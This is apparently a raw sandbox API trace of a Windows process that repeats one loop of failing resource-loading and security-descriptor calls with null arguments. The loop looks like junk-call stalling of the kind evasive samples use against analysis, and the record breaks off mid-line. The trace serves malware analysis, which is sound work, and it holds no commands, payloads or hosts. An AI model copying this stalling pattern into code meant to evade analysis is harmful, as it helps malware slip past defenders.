[0070.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.116] LockResource (hResData=0x0) returned 0x0 [0070.116] FreeResource (hResData=0x0) returned 0 [0070.116] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.116] LockResource (hResData=0x0) returned 0x0 [0070.116] FreeResource (hResData=0x0) returned 0 [0070.116] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.116] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.116] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.116] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.116] LockResource (hResData=0x0) returned 0x0 [0070.116] FreeResource (hResData=0x0) returned 0 [0070.116] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.116] LockResource (hResData=0x0) returned 0x0 [0070.116] FreeResource (hResData=0x0) returned 0 [0070.116] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.116] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.116] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.116] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.116] LockResource (hResData=0x0) returned 0x0 [0070.116] FreeResource (hResData=0x0) returned 0 [0070.116] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.116] LockResource (hResData=0x0) returned 0x0 [0070.116] FreeResource (hResData=0x0) returned 0 [0070.116] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.116] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.116] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.116] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.116] LockResource (hResData=0x0) returned 0x0 [0070.116] FreeResource (hResData=0x0) returned 0 [0070.116] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.116] LockResource (hResData=0x0) returned 0x0 [0070.116] FreeResource (hResData=0x0) returned 0 [0070.116] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.116] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.116] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.117] FreeResource (hResData=0x0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.117] FreeResource (hResData=0x0) returned 0 [0070.117] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.117] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.117] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.117] FreeResource (hResData=0x0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.117] FreeResource (hResData=0x0) returned 0 [0070.117] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.117] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.117] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.117] FreeResource (hResData=0x0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.117] FreeResource (hResData=0x0) returned 0 [0070.117] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.117] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.117] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.117] FreeResource (hResData=0x0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.117] FreeResource (hResData=0x0) returned 0 [0070.117] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.117] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.117] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.117] FreeResource (hResData=0x0) returned 0 [0070.117] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.117] LockResource (hResData=0x0) returned 0x0 [0070.118] FreeResource (hResData=0x0) returned 0 [0070.118] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.118] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.118] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.118] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.118] LockResource (hResData=0x0) returned 0x0 [0070.118] FreeResource (hResData=0x0) returned 0 [0070.118] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.118] LockResource (hResData=0x0) returned 0x0 [0070.118] FreeResource (hResData=0x0) returned 0 [0070.118] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.118] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.118] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.118] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.118] LockResource (hResData=0x0) returned 0x0 [0070.118] FreeResource (hResData=0x0) returned 0 [0070.118] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.118] LockResource (hResData=0x0) returned 0x0 [0070.118] FreeResource (hResData=0x0) returned 0 [0070.118] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.118] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.118] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.118] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.118] LockResource (hResData=0x0) returned 0x0 [0070.118] FreeResource (hResData=0x0) returned 0 [0070.118] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.118] LockResource (hResData=0x0) returned 0x0 [0070.118] FreeResource (hResData=0x0) returned 0 [0070.118] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.118] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.118] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.118] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.118] LockResource (hResData=0x0) returned 0x0 [0070.118] FreeResource (hResData=0x0) returned 0 [0070.118] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.118] LockResource (hResData=0x0) returned 0x0 [0070.118] FreeResource (hResData=0x0) returned 0 [0070.118] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.118] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.118] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.118] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.118] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.119] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.119] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.119] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.119] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.119] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.119] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.119] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.119] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.119] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.119] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.119] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.119] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.119] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.119] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.119] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.119] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.119] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.119] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.119] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.119] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.119] LockResource (hResData=0x0) returned 0x0 [0070.119] FreeResource (hResData=0x0) returned 0 [0070.119] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.120] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.120] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.120] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.120] LockResource (hResData=0x0) returned 0x0 [0070.120] FreeResource (hResData=0x0) returned 0 [0070.120] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.120] LockResource (hResData=0x0) returned 0x0 [0070.120] FreeResource (hResData=0x0) returned 0 [0070.120] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.120] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.120] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.120] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.120] LockResource (hResData=0x0) returned 0x0 [0070.120] FreeResource (hResData=0x0) returned 0 [0070.120] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.120] LockResource (hResData=0x0) returned 0x0 [0070.120] FreeResource (hResData=0x0) returned 0 [0070.120] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.120] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.120] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.120] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.120] LockResource (hResData=0x0) returned 0x0 [0070.120] FreeResource (hResData=0x0) returned 0 [0070.120] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.120] LockResource (hResData=0x0) returned 0x0 [0070.120] FreeResource (hResData=0x0) returned 0 [0070.120] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.120] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.120] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.120] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.120] LockResource (hResData=0x0) returned 0x0 [0070.121] FreeResource (hResData=0x0) returned 0 [0070.121] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.121] LockResource (hResData=0x0) returned 0x0 [0070.121] FreeResource (hResData=0x0) returned 0 [0070.121] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.121] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.121] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.121] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.121] LockResource (hResData=0x0) returned 0x0 [0070.121] FreeResource (hResData=0x0) returned 0 [0070.121] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.121] LockResource (hResData=0x0) returned 0x0 [0070.121] FreeResource (hResData=0x0) returned 0 [0070.121] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.121] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.121] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.121] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.121] LockResource (hResData=0x0) returned 0x0 [0070.121] FreeResource (hResData=0x0) returned 0 [0070.121] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.121] LockResource (hResData=0x0) returned 0x0 [0070.121] FreeResource (hResData=0x0) returned 0 [0070.121] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.121] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.121] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.121] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.121] LockResource (hResData=0x0) returned 0x0 [0070.121] FreeResource (hResData=0x0) returned 0 [0070.121] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.121] LockResource (hResData=0x0) returned 0x0 [0070.121] FreeResource (hResData=0x0) returned 0 [0070.121] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.121] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.121] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.121] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.121] LockResource (hResData=0x0) returned 0x0 [0070.121] FreeResource (hResData=0x0) returned 0 [0070.122] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.122] LockResource (hResData=0x0) returned 0x0 [0070.122] FreeResource (hResData=0x0) returned 0 [0070.122] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.122] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.122] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.122] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.122] LockResource (hResData=0x0) returned 0x0 [0070.122] FreeResource 